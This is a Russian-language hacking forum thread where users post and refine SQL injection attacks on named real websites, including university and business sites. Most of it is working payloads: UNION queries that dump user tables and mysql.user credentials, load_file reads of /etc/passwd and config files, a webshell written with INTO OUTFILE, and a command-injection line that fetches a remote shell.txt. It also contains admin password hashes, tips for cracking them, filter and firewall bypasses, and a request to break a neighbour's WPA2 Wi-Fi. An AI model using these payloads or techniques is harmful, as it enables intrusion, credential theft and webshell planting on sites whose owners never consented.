Tepp, на гугл может перекидывать, когда в адресе пробелы, но это наверно не тот случай...
Нет :) Это не тот слу4ай... Просто видимо админ сам сделал, 4тобы перекидывало на гугл
В общем попасть у меня туда никак не полу4иться 4толь??

Нет :) Это не тот слу4ай... Просто видимо админ сам сделал, 4тобы перекидывало на гугл
В общем попасть у меня туда никак не полу4иться 4толь??
видимо нет

Хо4у залезть в phpmyadmin
когда ввожу "http://ip/phpmyadmin" меня перекидывает на "http://google.ru/"
Как в phpmyadmin в таком слу4ае можно попасть?
а с чего ты взял, что он там установлен. Наверное его там попросту нет, сервер возвращает 404, а админ сделал в этом случае редирект =)

Имхо,если пхп май админа там нету, то и редирикт на гугл бы не ставили...зайди в раздел обзор уязвимостей в пхп май админ там есть список вероятных расположений... поперебирай их...

Имхо,если пхп май админа там нету, то и редирикт на гугл бы не ставили...зайди в раздел обзор уязвимостей в пхп май админа и поперебирай их...
ErrorDocument 404 http://google.com/
в чем проблемы?

Вот дилема =) Стока мучился... вобщем можно ли как нибудь вывести http://www.auto24team.de/index.php?who=-999+ union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 ,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,8 7,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102, 103,104,105,106,107,108,109,110,111,112,113,114,11 5,116,117,118,119,120,121,122,123,124,125,126,127, 128,129,130,131,132,133,134,135,136,137,138,139,14 0,141,142,143,144,145,146,147,148,149,150,151,152, 153,154,155,156,157,158,159,160,161,162,163,164,16 5,166,167,168,169,170,171,172,173,174,175,176,177, 178,179,180,181,182,183,184,185,186,187,188,189,19 0,191,192,193,194,195,196,197,198,199,200,201,202, 203,204,205,206,207,208,209,210,211,212,213,214,21 5,216,217,218,219,220,221,222,223,224,225,226,227, 228,229,230,231,232,233,234,235,236,237,238,239,24 0,241,242,243,244,245,246,247,248,249,250,251,252, 253,254,255,256,257,258,259,260,261,262,263,264,26 5,266,267,268,269,270,271,272,273,274,275,276,277, 278,279,280,281,282,283,284,285,286,287,288,289,29 0,291,292,293,294,295,296,297,298,299,300,301,302, 303,304,305,306,307,308,309,310,311,312,313,314,31 5,316,317,318,319,320,321,322,323,324,325,326,327, 328,329,330,331,332,333,334,335,336,337,338,339,34 0,341,342,343,343,345,346,347,348,349,350,351,352, 353,354,355,356,357,358,359,360,361,362,363,364,36 5,366,367,368,369,370,371,372,373,374,375,376,377, 378,379,380,381,382,383,384,385,386,387,388,389,39 0,391,392,393,394,395,396,397,398,399,400,401,402, 403,404,405,406,407,408,409,410,411,412,413,414,41 5,416,417,418,419--
http://www.auto24team.de/index.php?who=1 group by 419-- Все норм. Тока вывод пропал... =)

Assembler, и ты вручную вбивал ? Оо

Муторно это ковырять ...

http://www.auto24team.de/fiat.php?sectio=16+and+if(substring(version(),1,1) =4,1,0)=1/*&who=1&info=1

4 ветка

Да вручную... Потом делфу запустил и программку написал которая сама делает, =) скока напишешь стока числе подряд через запятую =)

Привет всем. Есть у меня SQL Инъекция http://www.yivo.org/index.php?tid=-99999+union+select+1,2,3,4,5,6,7,8,9/* но поля почему-то не выводятся. Это слепая инъекция (с такими дела не имел)?

http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9/*

159932, спасибо, это и есть слепая инъекция? И если можно - объясните пожалуйста что значит and+1=0...

какая слепа????


http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(h ex(version())),5,6,7,8,9/*


и вообще лей шелл:


http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(h ex(file_priv)),5,6,7,8,9+from+mysql.user/*


правда там сложновато будет:))


http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,load_fi le(0x2F6574632F706173737764),5,6,7,8,9/*

Pashkela, спасибо и вам. Язнаю что такое unhex и hex. Но все же мне интерестно, что значит вот это: and+1=0? Я извеняюсь, в инъекциях я новичок, вот и хочу подучиться...

просто вызываешь ошибку, 1 никогда не будет равен 0, вместо запятой или минуса, нарушаешь логику sql-запроса, способо много, от кавычки до or, читай статью

https://forum.antichat.ru/thread104591.html

кстати вот еще довольно интересная инфо:


http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,load_fi le(0x636F6E6669672E706870),5,6,7,8,9/*


а нужны данные из базы - только брут. Например SIPT4

просто вызываешь ошибку, 1 никогда не будет равен 0, вместо запятой или минуса, нарушаешь логику sql-запроса, способо много, от кавычки до or, читай статью
Спасибо, логично. Я пытался минусом и кавычкой, но не выводилось ничего.


http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,load_fi le(0x636F6E6669672E706870),5,6,7,8,9/*
Значит load_file работает? + Сервер на виндовсе стоит... + Расскрыте путей DB! Спасибо!

а нужны данные из базы - только брут. Например SIPT4
все гораздо банальнее
http://www.yivo.org/index.php?tid=1+and+null+union+select+1,2,3,userna me,5,password,7,8,9+from+users/*

и вообще лей шелл
интересно как)
правда, значение восьмой колонки участвует в другом запросе (8=username), но и там ковычки слешируются:
http://www.yivo.org/index.php?tid=1+and+null+union+select+1,2,3,4,5,6, 7,0x2d312920756e696f6e2073656c65637420312c322c332c 342c352c362c372c5c27785c272c392c31302c31312c31322c 31332c31342c31352c31362c31372c31382c31392c32302c32 312c32322c32332c32342c32352c32362c32372c32382c3239 2c33302c33312c33322c33332c33342c33352c33362c33372c 33382c33392c33302c34312c34322c34332c34352c34362c34 372c34382c34392c35302c35312c35322c35332c35342c3535 2c35362c35372c35382c35392c36302c36312c36322c36332c 36342c36352c36362c36372c36382c36392c37302c37312f2a ,9/*

2. Assembler вобще говоря, в таких случаях лучше всего рассматривать информативный текст (аля 0xlala)
вывод в исходниках:
http://www.auto24team.de/index.php?who=9999+union+select+1,1,concat_ws(0x3a ,user,password,host),1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1+from+mysql.user+limit+1,1--+
file_priv=y, и судя по выводу на серваке есть pma

Здравстуйет
Вопрос такой
В phpmyadmin`е сделал запрос вида
select '<? @include("http://__________/shell.txt"); ?>' into outfile '\htdocs\shelll.php'

вернул истину,при попытке обратится к файлу http://__________/shell.txt
пишет страница не существует!

into outfile '\htdocs\shelll.php'

при попытке обратится к файлу http://__________/shell.txt

а теперь подумай

:)

http://www.allfun.md/index.php?page=type&id=sql

кому нечево делать помогите..

downloader
нету скули?

чем лучше переводить текс в хек ... дайте ссылочку ... и лутче онлайн

чем лучше переводить текс в хек ... дайте ссылочку ... и лутче онлайн

<?
$n="Тут текст, который надо захексить";
echo "0x".bin2hex($n);
?>

f1ng3r, специально для тебя написал http://yandexclub.ru/hack/hex.php

f1ng3r
http://noxak.ru/tools/ - тут много во что перевести можно... вобщем отличная вещь!

http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+unoin+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*
что думаете?

что думаете?
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+unoin+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*

долго ломал голову что там)))
после этого запроса все стало понятно :)
http://studorgs.bowdoin.edu/meddies/news.php?nid=10+and+substring(version(),1,1)=3/*
3 ветка,поэтому вывода нет (union введён с четвётой версии mysql)

p.s там вроде 8 полей) а не 18
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+order+by+8/*

Помогите найти табличку с админами...
http://www. travelwings .ru/article.php?id_article=-5+union+select+1,2,3,4,5,6,7,8,9,0,1/*

Думаю, что тебе поможет брутер+список названия таблиц...

Думаю, что тебе поможет брутер+список названия таблиц...
Можно и так, но есть способ лучше :)

Заходим в админку:
http://www.travelwings.ru/admin/login.php
Видим вверху надпись:
Citrus CMS v2.0
Гуглим и находим офф сайт этой цмс:
http://citrus-soft.ru
Видим. что она платная, значит с кодом обламываемся :) , но в портфолио присутствуют ещё сайты на этом движке, и существует вероятность найти пятую ветку и посмотреть структуру базы. Удачи

jokester, я этим в первую очередь и занялся... болт там, все на 4ой!

Можно и так, но есть способ лучше :)

Заходим в админку:
http://www.travelwings.ru/admin/login.php
Видим вверху надпись:
Citrus CMS v2.0
Гуглим и находим офф сайт этой цмс:
http://citrus-soft.ru
Видим. что она платная, значит с кодом обламываемся :) , но в портфолио присутствуют ещё сайты на этом движке, и существует вероятность найти пятую ветку и посмотреть структуру базы. Удачи

Да CMS платная, но у них инъекция в этой CMS. И самое, что интересное - на их сайте MySQL крутится из под рута. Пытался залить шелл, но видно пропалили... Сейчас инъекция просто на пустую страницу вываливает. И все портфолио которые сделаны на базе этой CMS - дырявые.

Да CMS платная, но у них инъекция в этой CMS. И самое, что интересное - на их сайте MySQL крутится из под рута. Пытался залить шелл, но видно пропалили... Сейчас инъекция просто на пустую страницу вываливает. И все портфолио которые сделаны на базе этой CMS - дырявые.
Вообще-то я об этом и писал, в портфолио тоже есть и пятая ветка , и рут, но видимо админы не дремлют(я полагаю туда народ ломанулся толпой ), т.к. сейчас у меня тоже запрос не проходит :)

есть иньекция после insert в поле регистрации, потом форма регистрации записывается в табличку с пользователями, можно ли достроить запрос, что бы зарегистрировать юзера с правами админа? что вообще можно с этой инъекцией сделать?
зарание спасибо)

pinky07, http://www.cyberguru.ru/database/sql/sql-injections-page5.html

Тепер вопрос . база mysql5 . но филтруеца ' .. при током запросе идёт филтер ....

COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1+--



ww~w.so-znanie.co~m/index.php?id=-2+union+select+1,2,3+--
както обоити мозно?


Помогите новичку . штоб не флюдить мозна и в ПМ

Ну тогда то что в кавычках пытаешься подать - захексируй.. в hex

Вот атк


<?php
set_time_limit(0);
$form = <<<FORM
<form method="post" action="">
<textarea name="txt" rows="20" cols="100"></textarea>
<input type="submit" name="ok">
</form>
FORM;
if ($_POST['txt'] and $_POST['ok']){
$my_url=$_POST['txt'];
$strlength = strlen($my_url);
for($i=0; $i<$strlength; $i++){
$returnval .= dechex(ord(substr($my_url, $i, 1)));
}
echo '0x' . $returnval;
}else{
echo $form;
}



?>

2 попугай
я нечего непонел из етого пхп кода .... я нерозбераюс в нём вопше . если нетрудно мош поподробние в пм скинут


и есё вопросик . где мозно раскодироват парол от логина... просто узнал парол от аккаунта а он в кодирофке

5870dc3ee770e65bb1a4a267f7c4fc6e

и есё вопросик . где мозно раскодироват парол от логина... просто узнал парол от аккаунта а он в кодирофке

5870dc3ee770e65bb1a4a267f7c4fc6e
Это md5
расшифровать можно здесь: https://forum.antichat.ru/threadnav83865-1-10.html
и здесь: https://hashcracking.info/
и здесь: http://www.google.ru/search?hl=ru&q=md5+online+cracker
или с помощью ПО, рекомендую PasswordsPro от InsidePro

2 попугай
я нечего непонел из етого пхп кода .... я нерозбераюс в нём вопше . если нетрудно мош

Подробнее:

Если хотим посмотреть колонки в таблице, но кавычки фильтруются, то таблицу кодируют.
Кодируем в hex.

http://so-znanie.com/index.php?id=-2+union+select+1,2,column_name+FROM+INFORMATION_SC HEMA.columns+where+table_name=0x61646d696e73+limit +0,1--

Где, 0x61646d696e73 - таблица admins.

Закодировать можно например на этом сайте - http://x3k.ru (SQL Hex)

При переводе в hex - кавычки не использовать.

Подробнее:

Если хотим посмотреть колонки в таблице, но кавычки фильтруются, то таблицу кодируют.
Кодируем в hex.

http://so-znanie.com/index.php?id=-2+union+select+1,2,column_name+FROM+INFORMATION_SC HEMA.columns+where+table_name=0x61646d696e73+limit +0,1--

Где, 0x61646d696e73 - таблица admins.

Закодировать можно например на этом сайте - http://x3k.ru (SQL Hex)

При переводе в hex - кавычки не использовать.

можно еще через чар, получится так:

http://site.com/index.php?id=-2+union+select+1,2,column_name+from+information_sc hema.columns+profiling+where+table_name+LIKE+char( 97,100,109,105,110,115)+limit+0,1--

где char(97,100,109,105,110,115) = admins

когда вверху странички пишет:
/includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу.

что то можна зделать?

когда вверху странички пишет:
/includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу.

что то можна зделать?
установить необходимые права и спать спокойно.

Можно ли провернуть SQL injection при ошибке следующего вида:

http://beatlesfestival.net.ua/requests.php?action=reset&requestid=sql'

Читал faq'и, везде используют конструкции вида +union+select+кол-во_полей--
А в данном случае, не пойму как это заюзать.

А с чего ты взял, что оно там есть и что оно не пофиксено?

http://www.sovtest.ru/news.php?id=999999999999%20union%20select%201,2,3, 4,5,6,7,8--
Как быть тут..? Вроде есть вывод. Циферки показывает.. А пишешь Version() и ппц -(

http://www.sovtest.ru/news.php?id=999999999999%20union%20select%201,2,3, 4,5,6,7,8--
Как быть тут..? Вроде есть вывод. Циферки показывает.. А пишешь Version() и ппц -(
http://www.sovtest.ru/news.php?id=99999+union+select+1,unhex(hex(version ())),3,4,5,6,7,8--

aka PSIH, можешь пальцем тыкнуть где там вывод че то я в упор не вижу -(

aka PSIH, можешь пальцем тыкнуть где там вывод че то я в упор не вижу -(
смотри (http://pic.ipicture.ru/uploads/090219/7z90FaJ3LT.jpg)

p.s: пробелы удали =\

Мм... Дайте почитать что-нибудь о PUT, TRACE и WRITE методах.
Или подскажите... Есть сайт, у него корень со всеми этими параметрами... Как мне загрузить туда шелл, etc.?
Спасибо...

Stradi , тоесть нам нужно поискать в гугле и выложить тебе готовые линки? Или как?
Ты считаешь это вопрос по уязвимостям?

ГУГЛ:
RFC 2068
http://lib.misto.kiev.ua/WEBMASTER/rfc2068/rfc2068rus.txt

Если что-то ещё найти, обращайтесь, но сначала лучше попытаться сдесь:
Жмах (http://www.google.com)

Stradi , тоесть нам нужно поискать в гугле и выложить тебе готовые линки? Или как?
Ты считаешь это вопрос по уязвимостям?

ГУГЛ:
RFC 2068
http://lib.misto.kiev.ua/WEBMASTER/rfc2068/rfc2068rus.txt

Если что-то ещё найти, обращайтесь, но сначала лучше попытаться сдесь:
Жмах (http://www.google.com)
Спасибо конечно... Я и сам знаю, что такое гугль о_О
Я имел ввиду что вы мне можете посоветовать, ибо я не в курсе, как правильно поставить вопрос гуглю по этому поводу...
Я к тому - что можно получить с этих параметров... А не прошу учить пользоваться поисковой системой... Вот...

Если тебе такое выдал XSpider, то можешь забыть об этой ерунде

Stradi, как ты узнал, что они включены для корня сайта? С помощью OPTIONS? Так он говорит какие методы сервер потенциально поддержвает, но по умолчанию они отключены, а если и включены, то регулируются айпишники с помощью .htaccess.

Stradi Вопрос некорректен, складывается впечатление, что ты сам не до конца понимаешь, что тебе нужно. Я полагаю, ты отсканировал какой-то ресурс иксспайдером и сканер выдал тебе что-то типо "доступен метод TRACE".
Это не параметры, это методы запроса и для того, что-бы тебе разобраться я привёл линк, который лучше прочесть, а затем, исходя из прочитанного уже задавать вопросы

Stradi,

http://www.xakep.ru/post/17540/default.asp
http://www.inattack.ru/article/516.html Пункт 3

Stradi Вопрос некорректен, складывается впечатление, что ты сам не до конца понимаешь, что тебе нужно. Я полагаю, ты отсканировал какой-то ресурс иксспайдером и сканер выдал тебе что-то типо "доступен метод TRACE".
Это не параметры, это методы запроса и для того, что-бы тебе разобраться я привёл линк, который лучше прочесть, а затем, исходя из прочитанного уже задавать вопросы
А разве я где-то писал что похож на специалиста по сетевой безопасности?

Сканировал вовсем не XSpider'ом, тоже сканер, но...
Directories with WRITE permissions enabled
Vulnerability description
Web Scanner was able to create a test file in this directory using the PUT method. The name of the file created is Test_File.txt. You should remove this file after setting proper permissions.
Вуаля, файл там есть. Я просто хочу понять, каким образом все это происходит, и всё...

Stradi,

http://www.xakep.ru/post/17540/default.asp
http://www.inattack.ru/article/516.html Пункт 3
Спасибо...

Привет всем ! :)
объясните пожалуйста как происходит пхп иньекция, с чего начать . Вот допустим есть сайт и что дальше то делать? многое прочитал только каша в голове получилась не пойму как вот узнать на пример сколько нужно поставить слешей с точками ../../../../
откуда берется их количество? или все методом подбора?
кто ни будь может поэтапно объяснить на каком ни будь простеньком примере?

joomler
https://forum.antichat.ru/thread23501.html
https://forum.antichat.ru/thread12123.html
https://forum.antichat.ru/thread91807.html

"Слешей с точками" :) много не бывает, выше корня не поднимишься, остальное в статьях, лучше не объяснить, там всё расписано

Возможно ли раскрутить скуль http://scooter-club.ru/index.php?content=yes&page_id=49' ?

u36a,

http://scooter-club.ru/index.php?content=yes&page_id=-49+union+select+1,version()/*

http://scooter-club.ru/index.php?content=yes&page_id=-1+union+select+1,database()+/*

А есть ли возможность посмотреть присутствует ли file_priv у данного пользователя?

если доступа к mysql.user нет - то скорей всего file_priv нет. А если есть доступ то запрашиваешь колонку file_priv из таблицы mysql.user - если Y -то есть, если N - то нет

u36a, возможность есть. в твоем случает file_priv не присутствует :)
https://forum.antichat.ru/showpost.php?p=942609&postcount=34
вот тут все описано, не буду цитировать.

u36a, сделай в поле вывода LOAD_FILE('/etc/passwd') если сервак юниксовый... при наличии файлприва получишь содержимое, при отсутствии - или пустоту или ошибки... Ну в общем вывода не будет...

спасибо , счас почитаю)))))

https://forum.antichat.ru/showpost.php?p=942609&postcount=34
вот тут все описано, не буду цитировать.

Помимо там описанного не забываем так же о табличке user_privileges из information_schema.

SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%'

u36a, но в твоем случае это не прокатит т.к. версия 4.1. Заюзай вариант с LOAD_FILE, как уже было предложено

что то у меня не получается)
http://studorgs.bowdoin.edu/meddies/members.php?mid=-27+or+1=1/*
http://cyberbuzz.gatech.edu/ice_hockey/news.php?nid=-4+or+1=1/*&PHPSESSID=8021c6f2f9284e9566bd87b298ef8f30
http://ext.wsu.edu/pnn/user/viewNotification.php?nid=-2007-326+or+1=1--
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+or+1=1/*
http://www.umass.edu/research/rld/bioportal/viewfac.php?fid=-79+or+1=1/*

http://www.mgv.edu/view_news.php?nid=-1+union+select+1,version(),3,4--
а в чем проблема?

http://studorgs.bowdoin.edu/meddies/members.php?mid=28+and+substring(version(),1,1)=3/*
http://cyberbuzz.gatech.edu/ice_hockey/news.php?nid=5+and+substring(version(),1,1)=3/*
http://studorgs.bowdoin.edu/meddies/news.php?nid=10+and+substring(version(),1,1)=3
http://www.mgv.edu/view_news.php?nid=3+union+select+1,version(),3,4--+

Когда-же ты будешь помнить про третью ветку? :)

jokester
как всегда оставил тройки))

-mOrGan-
незаметил)

Привет,
Есть адрес :
http://magicweb.md/news.php?id=-28+union+select+1,2,3,4,5,6,7/*

DataBase() : usr_mweb2_4
Version() : 5.0.32-Debian_7etch8-log
User() : mweb2@localhost

Tables ### jos_users ,user
Columns ### ID , group_ID , login , pass , name , email ,lastvisit , ---(это от таблицы user) |

id , name , username , email , password , usertype --- (от таблицы jos_users )

Вопрос :
Я когда пытаюсь писать например :
magicweb.md/news.php?id=-28+union+select+1,2,3,concat(username,0x3A,passwor d)+from+jos_users/*
То выскакивает ошибка. Я пытался обходить типа unhex(hex(username)) ,ili convert(username+using+latin1) ... но у меня не выходит вывести данные с таблицы . Подскажите пожалуйста что делать .

Stalingrad
http://magicweb.md/news.php?id=-28+union+select+1,2,3,concat_ws(0x3a,username,pass word),5,6,7+from+usr_mweb2_1.jos_users/*
таблица в другой базе

2sabe,

http://www.umass.edu/research/rld/bioportal/viewfac.php?fid=-79'+union+select+1,2,3,4,5,6,version(),8,9,0,11,12 ,13,14,15,16,17,18--+

почему так?

http://www.diocesispinardelrio.net/active/verunanoticia.php?ID=46+order+by+4--

однако , http://www.diocesispinardelrio.net/active/verunanoticia.php?ID=46+union+select+1,2,3,4-- не работает... ?

вроде как инъект без вывода...
http://www.diocesispinardelrio.net/active/verunanoticia.php?ID=46+and+substring(version(),1, 1)=4--

есть таблица user.

Точно сказать не могу...кодировать не пробовал?

как?)

ну hex на пример...

есть запрос для залития шелла)


при этом фильтрует "http://"
тоесть https:// уже не фильтрует... но так не заливается.. наверника изза того что некому принять сертификат))
подскажите как обойти такой фильтр?
а ftp:// фильтрует?

всем привет )
подскажите когда я проверяю скрип на -> ' но там все нормально , но когда я подставляю большое число пишет что запись с таким номером отсутствует ошибки скуля нет вот примет id=234 нормально а подставиш id=2349999 пишет что не существует. Говорит ли это что есть уязвимость?
Я вчера впервые провел пхп иньекцию прикольно))))

Читаем:

http://forum.antichat.ru/thread104591.html

нет, это говорит о том, о чем оно говорит) что такой записи нету.
Я вчера впервые провел пхп иньекцию прикольно))))поздравляю

всем привет )
подскажите когда я проверяю скрип на -> ' но там все нормально , но когда я подставляю большое число пишет что запись с таким номером отсутствует ошибки скуля нет вот примет id=234 нормально а подставиш id=2349999 пишет что не существует. Говорит ли это что есть уязвимость?
Я вчера впервые провел пхп иньекцию прикольно))))Угу, отсутствие страницы явно уязвимость. Из категории рутовых яваскриптов по протоколу TCP/IP, можно использовать только по вечерам четверга с 19:00 до 23:30 по местному времени.

laedafess
фтп не фильттрует))

-m0rgan-
какой хекс в смд? или я не понимаю

.php?dirname=+%26cd+_notes;fetch+http://site.com/shell.txt+-O+v.php%26

при этом фильтрует "http://"
а https:// не фильтрует.. но так не заливается.. наверника изза того что некому принять сертификат)) ftp:// тоже не фильтрует, фпт бес пароля fetch сможет пробить файл?)

подскажите как обойти такой фильтр?

без протокола религия не позволяет?=) как вариант echo uploader > file

http://www.costa-real.ru/articlesInfo.php?id=-1+union+select+concat_ws(0x3a,user,password,email) ,2,3,4,5,6+from+ae_users--

Пароль админа в исходном тексте:
admin:21232f297a57a5a743894a0e4a801fc3
т.е admin:admin

админку долго не искал:

http://www.costa-real.ru/admin/index.php

Не пойму, почему залогиниться не могу?

А что делать если при пхп иньекции фильтруются все символы просто убераются((
?act=(d,z.s:skfds) - выведет dzsskfds / а если ввести ?act=(d,z.s:s#kfds) - то только dzss обьясните такую странность)

Пароль админа в исходном тексте:
admin:21232f297a57a5a743894a0e4a801fc3
т.е admin:admin

админку долго не искал:


Не пойму, почему залогиниться не могу?
Поищи другие таблицы, ибо не исключено,что этот логин/пасс не от админки...

pingvit там есть таблица pmr_admins , скорее всего там как раз и хряняться логин с пассом админки, вот логин: admin, вот md5 хэш пароля: 08913870713a4b932d796e47ccaebe8c
P.S. там ещё есть таблицы jos_users, phpbb_users, pmr_users но это все не то...

Привет всем)
у меня проблемка. Есть доступ в админку на сайте, я хотел было залить шелл туда но там нет таких полей(ни чего туда не загрузить кроме текста копи-паст, который отправляется в базу)
Мне бы хотелось рипнуть сайт, но как туда залить шелл? или может еще как то можно?
пробовал скуль иньект выдает это: Table 'kalinov_refer.passwords' doesn't exist
может как то скуль надо раскрутить?

joomler отвлекись ненадолго от компа, и подумай какого ответа ты сдесь ждёшь?

Вот просто , как , по твоему, на твой вопрос можно ответить? Ни сайта, ни даже названия движка ты не привёл, что там в твоей админке никто не знает, скуль? ну разумеется через скуль можно залиться, при соблюдении определённых условий, которые кстати перечислены в обзоре, линк на который ,в свою очередь, тебе давали выше.

Подвязывай заниматься ерундой, и почитай статьи на форуме. И многое станет ясно, а такими вопросами ты себе знаний не добавишь

jokester да наверное поторопился, надо почитать сначало на форуме согласен, но хочется то все и сразу)))))
Исправляю ошибки: 1) Что за движек я так и не понял , возможно он самописный
2) Вот сайт и уязвимый скрипт:
http://referats-online.ru/catalog_44.html?pid=44+union+select+1+from+user 3) В админке кроме редактирования статей и новостей больше ни чего нет. http://referats-online.ru/admin
Логин: 1
Пароль: 1

Ну теперь пойду почитаю топики)))

Я вот нашел такое:
http://devicebondage.stockroom.com/category.aspx?category_id=196'
а что с ним делать?

_Zeus_, это mssql-inj. почитай статьи, и попробуй докрутить.
кстати, очень удобная скуля для новичка, я в свое время на такой же тренировался.

Никакая это не mysql.

Это MSSQL.

http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=@@version

Читаем это:

http://forum.antichat.ru/thread30501.html

Решил попробовать =) MSSQL
http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
Выдает STORE_USER_ASSN
Дальше через Not in но чета не получается, в чем ошибка?
category_id=196 or 1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' STORE_USER_ASSN'))--

WebKnight Application Firewall Alert



AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.

возможно фаер блокирует остальные запросы

Да ну, я не верю, что здесь ничего нельзя сделать.
Невозможного не бывает. Жаль, что я в этом нечего почти не понимаю.

Решил попробовать =) MSSQL
http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
Выдает STORE_USER_ASSN
Дальше через Not in но чета не получается, в чем ошибка?
category_id=196 or 1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' STORE_USER_ASSN'))--
фильтруется киворд WHERE

Можно было бы попробывать having но group by и having также фильтруеться.

и подводя итоги:
http://devicebondage.stockroom.com/category.aspx?category_id=196+and+1=(select+top+1+ table_name+from+information_schema.columns%0awhere %0acolumn_name%0alike%0a'%pass%')

ПРивет всем =)
Может хтото может мне помоч буду очень признателен =)
Проблема у меня слудующая ... у меня в квартире есть сигнал wi fі офиса которий по соседству но там стоит пароль (((
Мне нужно както узнать пароль доступа... какой прогой ето можно сделать бистрее и безопасней =)
КОд безопасності там в шифровке wра2

ПРивет всем =)
Может хтото может мне помоч буду очень признателен =)
Проблема у меня слудующая ... у меня в квартире есть сигнал wi fі офиса которий по соседству но там стоит пароль (((
Мне нужно както узнать пароль доступа... какой прогой ето можно сделать бистрее и безопасней =)
КОд безопасності там в шифровке wра2


темой ошибся

http://forum.antichat.ru/forum113.html

http://www.ajjp.org/campaigns/signStatement.php?cid=-15+union+select+1...25
Дошел до 25... Там так много столбцов?

и подводя итоги:
Дык, таки не поддаеться. Веб Кнайт. :(

там же их 8.

Дошел до 25... Там так много столбцов?

ордер бай говорит что их 8, но унион говорит что нет((((
наверное фильтруеться унион. Можна подзапросами мучать но я в них неселен(

А все равно 4-ая ветка, брут только:


http://www.ajjp.org/campaigns/signStatement.php?cid=15+and+substring(version(),1 ,1)=4/*

[JavaScript], должно быть параметр передается в несколько запросов. Мне не удалось засечь вывод, поковыряй еще сам https://forum.antichat.ru/showpost.php?p=1047515&postcount=79

Можна подзапросами мучать но я в них неселен(

Там версия 4.0 .. Подзапросы появились начиная с 4.1.0

:( я в печале

допустим у нас есть такой код:

$pass = $_GET['pass'];
$pass = preg_replace("/'/", "\", $pass);
$pass = preg_replace("/\//", "\", $pass);
// etc preg_perlace заменяет некоторые символы на слэш

mysql_wuery("SELECT * FROM passwords where (pwd = '$pass' or pwd = '$pass' or pwd = '$passs')");

Собственно, ковычка обрезается, т.е. получается:
SELECT * FROM passwords where (pwd = '\' or pwd = '\' or pwd = '\')

1. До перестановки системы у меня в закладках был хороший онлайн декодирощик, адрес вспомнить немогу... а он во всё подряд переводил... сожет кто подкинет линк. кто чем пользуется!.

2. /index1.php?show=about&id0=-1+union+select+1,2,3 --

вывод на 2 поля 1 и 2 .... пишу version() или @@version ошибка.. что делать?

2 F4R

www.x3k.ru
http://www.webfuture.ru/igo/convert.php


/index1.php?show=about&id0=-1+union+select+1,aes_decrypt(aes_encrypt(version() ),0x71),0x71),3 --

2 F4R

www.x3k.ru
http://www.webfuture.ru/igo/convert.php


/index1.php?show=about&id0=-1+union+select+1,aes_decrypt(aes_encrypt(version() ),0x71),0x71),3 --


x2k.ru

тормозной и неудобный а второй тока в sql и ораклу умеет... нао что то другое... или может есть какая то програмулька ?

